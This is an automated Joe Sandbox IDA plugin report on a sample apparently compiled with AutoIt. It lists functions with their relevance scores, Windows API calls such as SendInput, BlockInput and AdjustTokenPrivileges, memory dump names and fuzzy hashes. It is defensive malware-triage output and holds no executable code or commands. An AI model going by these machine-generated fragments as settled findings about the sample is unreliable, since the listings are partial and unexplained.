
Strings

X64, xrefs: 0056D2A8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
Instruction ID: 34cacf5799088c056a9b5001acc38c10fcd8f24555b7ad87b395c2364a787781
Opcode Fuzzy Hash: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
Instruction Fuzzy Hash: 84D0CAB880116DEACB94CBA0EC8CDDEBBBCBB15305F100A92F506A2040EB3496489F20

Function 0053CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: fcaf572f7ff181801ed2caa820e665f338e686476372e5d8e27cefae35fad23e
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: E8020B72E002199BDF14CFA9C8906ADBFF5FF88314F25816AD819FB285D731AD418B94

Function 0051CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00560C40
p#^, xrefs: 0051CF7F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#^
API String ID: 0-3707816926
Opcode ID: 607fbb545c62b91e5e6cfee59dec75b3a9caa98151dd821c5a9c170d6b15fc32
Instruction ID: 2807d7fc1836201bd9873582010fc7f00350088419aac3f565dcc528cbf25a3d
Opcode Fuzzy Hash: 607fbb545c62b91e5e6cfee59dec75b3a9caa98151dd821c5a9c170d6b15fc32
Instruction Fuzzy Hash: 1C32C030940219DFEF14DF90D885AEEBFB9FF45304F108459E806AB292D736AD86CB60

Function 005868EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00586918
FindClose.KERNEL32(00000000), ref: 00586961

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
Instruction ID: 92dfe15808c49cd0ccfba3780411d71d20029e8ed3f7a5579bcaf8d9de36e887
Opcode Fuzzy Hash: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
Instruction Fuzzy Hash: D71190356042019FD710DF29D489A16BFE5FF89328F14C699E8699F7A2CB30EC45CB91

Function 005837B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837F4

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
Instruction ID: a6f8d38a89109b4b3722f9ac3bc4949022bce98d14447c11d8e8f71cdf397620
Opcode Fuzzy Hash: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
Instruction Fuzzy Hash: 7DF0EC706042152AE71067654C4DFDB3F9DFFC5B61F000175F905E2281D9609D48C7B0

Function 0057B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0057B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0057B270

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
Instruction ID: fa89f0b1796bb0ab1996e96e381df4b7cf9068d0bd5d1a0053f1d3c435a53079
Opcode Fuzzy Hash: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
Instruction Fuzzy Hash: 8CF01D7580424DABEB059FA0D805BBE7FB4FF09309F008409F955A5192C3798615AF94

Function 005710BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: b71e833ee5e7f328f20a3935f52b822c6ae686643d819bcbc8cb8507f77ef99b
Instruction ID: a9e1315f29f48ef04729aaa2af4eb85710bee989828662f9d1c3b48f999a4b77
Opcode Fuzzy Hash: b71e833ee5e7f328f20a3935f52b822c6ae686643d819bcbc8cb8507f77ef99b
Instruction Fuzzy Hash: 52E04F32004611AFE7252B11FC09E777FA9FF05310B10882EF4A6804B1DB626C90EB14

Function 0054676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00546766,?,?,00000008,?,?,0054FEFE,00000000), ref: 00546998

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
Instruction ID: e93db8e4fcc023ba353d75c78951ea72e99b9ec9bab419e8e81d22aa8d84caec
Opcode Fuzzy Hash: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
Instruction Fuzzy Hash: 22B15B31610609DFD719CF28C48ABA57FE0FF46368F258658E899CF2A2C335E991CB41

Function 0052B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0056851F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
Instruction ID: 5c5ea13b49c66f16d1b63a57e8fba0a420e47a1751b90403a6d7de34746e4853
Opcode Fuzzy Hash: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
Instruction Fuzzy Hash: 06126F75A002299BDF14DF58D8806FEBBF5FF59310F14859AE849EB291DB309E81CB90

Function 0058EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0058EABD

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
Instruction ID: e0f9a164f958f0ca17671cc39ec2c663608b09c8ba1b3d21dd89983a255078c8
Opcode Fuzzy Hash: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
Instruction Fuzzy Hash: EAE01A312002059FE710EF59D809E9ABFE9BF99760F008416FC49D7351DA70E8818B90

Function 005309D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005303EE), ref: 005309DA

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
Instruction ID: 6731236b3270fc932bb6af9d12ce81b37ddfd2a7c636efd81943a63c572f10a7
Opcode Fuzzy Hash: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
Instruction Fuzzy Hash:

Function 0053781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0053798B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: c72c856620d185eec990f30792e31fc344d2dd9885a31418fd5a459ee12330fe
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: EF516CF2E0C74E6BDB384568485E7BEAFC5BB5E340F180A49E982D7382C615DE01D355

Function 00582046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&^, xrefs: 00582053

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: 0&^
API String ID: 0-2485633877
Opcode ID: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
Instruction ID: efdc774adaccca72eb9060afdade9a38d72b28871f9316ceea658329a6bf2281
Opcode Fuzzy Hash: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
Instruction Fuzzy Hash: DE21D5326206518BDB2CCE79C82767A77E9B7A4310F14862EE4A7D73D0DE75A904DB80

Function 00546DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
Instruction ID: 538f5619cd2a7d3531932885f1cc1bcf4285ae1ba0609ecf9c2ad259a2c2a61d
Opcode Fuzzy Hash: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
Instruction Fuzzy Hash: 28324431D28F054EDB639634C8223756A8DAFBB3C9F15C737E81AB59A6EB28D4835100

Function 0052CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
Instruction ID: b4b2b6670b6a46d1a79ee37a0e1aa948a2e83be6d24b152ad9c1740506fc0e11
Opcode Fuzzy Hash: c26b292e18e9a31aba765d270f4dac030bdf9532f4e90805d650d0f913a44ca5
Instruction Fuzzy Hash: 1132F232A001658BDF28CE69D89467D7FA1FF46300F28856BD4EADB792D630DE81DB41

Function 00517920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc1533485a4c2fd750e087535616ecf4d5019415d79d3031f2614d04daca0d
Instruction ID: 96dd3358aa9fc646125892e4841828c2d94547bf540d9603fff657cf00a5c39a
Opcode Fuzzy Hash: eecc1533485a4c2fd750e087535616ecf4d5019415d79d3031f2614d04daca0d
Instruction Fuzzy Hash: 5A22B270A0460ADFEF14CF68D865AEEBBB5FF48301F10452AE816A7291FB35AD54CB50

Function 005191C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d770ef0d9a7176a2467d92ad6cdde11272bfe1d777bf8cdb7839571a0c374b85
Instruction ID: 569ac9444a55ac1755b9f3dd5d1498b080e8181ff17d1e372d27061967790070
Opcode Fuzzy Hash: d770ef0d9a7176a2467d92ad6cdde11272bfe1d777bf8cdb7839571a0c374b85
Instruction Fuzzy Hash: 5E02E8B1E00206EBDB05DF64D896AADBFB5FF44300F11856AE816DB291E731EE54CB81

Function 00531C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 776d4bfb39ffbb146dbfbe42a2817ca310806dc6a39976d7a32dd73c1ccdbdd8
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: C99178732084A34ADB69463E857407EFFE17A923A1B1A0B9DD4F2CB1C5FE24C954E724

Function 005319B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 7b77afa1755ae17b678c8bd0505fc09574663a2bd1a061a7bc7b46bc2d8ed6bc
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: AF9145732098E34EDB2D467A857403EFFE16A923A2B1A079DD4F2CB1C1FE14C964D624

Function 00537A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
Instruction ID: 50b5a69be44266dd7199e9a4bae3124cc82c5a7c218cc410244de98d72f1e9bc
Opcode Fuzzy Hash: 3209de6a0479d8c7121cce61d4ff15b729cf2cde7c9c6418e444edb62aa39ce3
Instruction Fuzzy Hash: 2F612AF1E0874E66DA785A2849B5BBEAFA4FF8D700F140D19F843DB281E6119E41C355

Function 00531706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 9127fcd35deeb4ff7a40335f90b528e0281608f6d0aa8d038872b92310812c53
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: E98188336094A34DDB6D863A853453EFFE17A923A1B1E079DD4F2CB1C1EE24C554D628

Function 00592ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00592B30
DeleteObject.GDI32(00000000), ref: 00592B43
DestroyWindow.USER32 ref: 00592B52
GetDesktopWindow.USER32 ref: 00592B6D
GetWindowRect.USER32(00000000), ref: 00592B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00592CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00592CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00592CF8
